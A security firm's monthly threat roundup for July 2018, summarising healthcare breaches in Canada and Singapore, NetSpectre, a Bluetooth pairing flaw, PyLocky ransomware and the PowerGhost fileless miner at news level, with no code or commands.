Top threats July 2018: paying respect through rewriting malware in python
Threat researchers and academics often tell me “this summer we can finally do some work”. So, we’re never expecting summer to be quiet on the threat side. That said, Defcon and BlackHat, the “Infosec summer camp” is in August, and many keep their work close until then. So, let’s see what July had in store for us:
Global healthcare breaches
Two major breaches within the healthcare sector were reported in July. In the first one, a Canadian healthcare services provider, experienced a data breach in which the attackers gained access to employee and patient health records, demanding ransom to avoid leaking the data online. This type of extortion has been steadily increasing in frequency over the last 2 years. The stolen data included Personally Identifiable Information (PII) such as date of birth, health numbers, phone numbers and details of past surgical procedures and medications. Interestingly, the news broke through the hackers themselves. When the company reported 1,513 stolen records, the hackers sent a sample of 80,000 records. This is interesting for two reasons: first that healthcare doesn’t always have the best reputation with regards to cyber defense, and secondly: this kind of event will happen in Europe, under the new GDPR law too. A few weeks ago, insurance agency AIG even warned that data will be worth more to criminals due to GDPR. While we find that reasoning is doubtful, we’re still eager to see how it plays out.
The second breach occurred on July 17th, as SingHealth, the largest healthcare group in Singapore, noted a massive data breach of 1.5 million records from patients who visited between May 2015 to July 2018. One record seemed to be of Singapore’s Prime Minister Lee Hsien Loong, which contained information about his medication. It was later concluded that the attack seemed well-planned, sophisticated and targeted, potentially even nation-state sponsored.
In the US, hackers going after VIP patient records is more common, but in other parts of the world the risk has always been deemed low. That’s why this event sparks interest, and this month global healthcare breaches are our top threat.
Researchers published the discovery of a new variant of Spectre, dubbed NetSpectre. This is a major evolution of the Spectre attack which makes it possible for an attacker to steal data remotely. It originates from the Spectre v1 vulnerability (CVE-2017-5753), which the SecureLink CDC reported on in January 2018. Consequently, all CPU:s affected by Spectre v1 are most likely affected by NetSpectre as well. NetSpectre is carried out remotely via a network connection, and does not need the initial compromise: it exploits a flaw in the speculative executive mechanism. Besides its innovative nature, NetSpectre is, as of August 20th 2018, still regarded as very slow, with an exfiltration speed of barely 15 bits/hour. This makes it rather theoretical, but as with all vulnerabilities, a new PoC could suddenly increase the risk tomorrow.
Further Reading: NetSpectre — New Remote Spectre Attack Steals Data Over the Network
We all love Bluetooth, right? Streaming music, making phone calls from your car- what would we do without it? There’s a reason you disable it when you visit a hacker conference, though.
A new Bluetooth hacking technique affects Operating System drivers from vendors such as Apple, Broadcom, Intel and Qualcomm. Two features are affected by the vulnerability: Bluetooth low energy (LE) implementations of Secure Connections Pairing and Bluetooth Basic Rate/Enhanced Data Rate (BR/EDR) implementations of Secure Simple Pairing. The vulnerability is an insufficient validation of the public encryption key received over-the-air during pairing. Attackers then can do a man-in-the-middle attack during the pairing process to inject malicious code and/or steal
So maybe disable Bluetooth a bit more often than only when you visit Defcon.
One of the notorious ransomwares, Locky, got honored by a bad actor who recreated it in Python. Or, at least, tried. Our Cyber Defense Center was among the first to detect this and did some research.
The malware used the file extension .locky, used Locky as a reference in the ransom note and was (surprisingly) written in python. Several features of the analyzed malware point towards an inexperienced malware developer. The binary was digitally signed with an actual valid certificate. Back-tracing the certificate, it showed that it was issued to a small UK company that, when looked up online, presented the searcher with a note that they are currently having issues, which indicates that they might have been breached. The certificate was issued on the July 24th 2018, 3 days before the SecureLink CDC came across the malware sample in the wild.
Others have given the malware the name “PyLocky”. Despite the UK connection, the malware seems to be targeting France exclusively.
In our CyberDefense Center, we’re seeing a sudden increase in Ransomware after a steady decline over the last months. While we don’t see PyLocky as an enormous risk to many, we’re putting it on number 3 today.
File less attacks are hip ‘n happening. Eternalblue is an easy choice as an exploit. A cryptocurrency miner was pretty much guaranteed to happen. And so PowerGhost, a new, file-less cryptocurrency miner, surfaced at the end of July. The malware uses Powershell and exploits the EternalBlue vulnerability to infect and move undetected across systems.
One special feature of the malware is that it can do DDOS too. The malware embeds itself remotely by using remote administration tools (RAT), in this case Windows Management Instrumentation (WMI). With the help of a one-line PowerShell script, the miner’s body is downloaded and immediately launches itself without writing it on the hard drive, making it more difficult to be noticed.
A big thank you to Diana Selck and the CDC teams for providing the input!